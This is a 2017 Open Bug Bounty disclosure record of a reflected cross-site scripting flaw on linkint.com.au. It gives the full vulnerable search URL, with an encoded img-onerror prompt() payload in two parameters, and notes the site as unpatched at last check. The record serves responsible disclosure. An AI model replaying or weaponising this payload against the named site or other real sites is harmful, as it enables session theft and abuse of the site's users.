linkint.com.au XSS vulnerability

2017-06-19T09:57:00
ID OBB:249920
Type openbugbounty
Reporter secuninja
Modified 2017-07-17T10:15:00

Description

Vulnerable URL:
http://www.linkint.com.au/search-results-s.html?webpage_id=1631&command;=cman_view_webpage&pkey;=linkint&webpage;_id=1295&inp;_profile_id=2&input;_Keywords_2_4=%3E%27%3E%22%3Et%3Ci%3Ep%3Cimg%20src%3Dx%20onerror%3Dprompt(%2Fopenbugbounty%2F)%3E&input;_Product_Starter_2_65=~~Keywords~~&input;_H_Code_2_6=~~Keywords~~&input;_H2_Code_2_11=~~Keywords~~&input;_H2_Keywords_2_32=~~Keywords~~&input;_H3_Keywords_2_35=~~Keywords~~&input;_H4_Keywords_2_50=~~Keywords~~&input;_H5_Keywords_2_53=~~Keywords~~&searchtype;=advsch&searchword;=%3E%27%3E%22%3Et%3Ci%3Ep%3Cimg%20src%3Dx%20onerror%3Dprompt(%2Fopenbugbounty%2F)%3E%20~~Keywords~~%20~~Keywords~~%20~~Keywords~~%20~~Keywords~~%20~~Keywords~~%20~~Keywords~~%20~~Keywords~~%20&inp;_search_refer=Y
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 29.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 1189992
VIP website status:| No
Check linkint.com.au SSL connection:| (Grade: A-)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 19 June, 2017 09:57 GMT
Generic security notifications sent to website owner| 19 June, 2017 10:00 GMT
Notification sent to subscribers (without technical details)| 19 June, 2017 14:17 GMT
Vulnerability details disclosed by researcher| 17 July, 2017 10:15 GMT